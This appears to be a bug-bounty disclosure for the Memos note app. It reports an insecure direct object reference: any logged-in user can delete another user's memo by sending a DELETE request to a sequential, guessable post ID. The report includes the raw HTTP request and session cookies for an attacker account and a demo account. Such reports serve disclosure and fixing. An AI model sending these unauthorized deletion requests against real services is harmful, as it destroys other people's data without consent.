# Description
As the title, an attacker can delete other user’s post via post id (can be bruteforce)
Here is video poc: https://drive.google.com/file/d/18QucWYwkpO9kVPMqNzSQ-ptwrZGk-UP9/view?usp=share_link
# Proof of Concept
“`
DELETE /api/memo/$1026$ HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MjAyMzkzNnxEdi1GQkFFQ180WUFBUkFCRUFBQUhfLUdBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUk9fMqNUegFqgfGemADcwgQYFDYFrRl2lsWdeCjjKUx_uEW
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
“`
The id `1026` is the post ID, when user create a post, the id increase 1 unit, so attacker can be delete other user’s post via this id and request DELETE
Here is the session id with each account:
`attacker session id` memos_session=MTY3MjAyMzkzNnxEdi1GQkFFQ180WUFBUkFCRUFBQUhfLUdBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUk9fMqNUegFqgfGemADcwgQYFDYFrRl2lsWdeCjjKUx_uEW
`User demo session id: ` memos_session=MTY3MjAyMzI4MXxEdi1GQkFFQ180WUFBUkFCRUFBQUhfLUdBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUE9fP5tDVSp1CxdxPlf5c_7FWcF5Yb5SFR7POch2HJbm_WDRead More
References
Back to Main
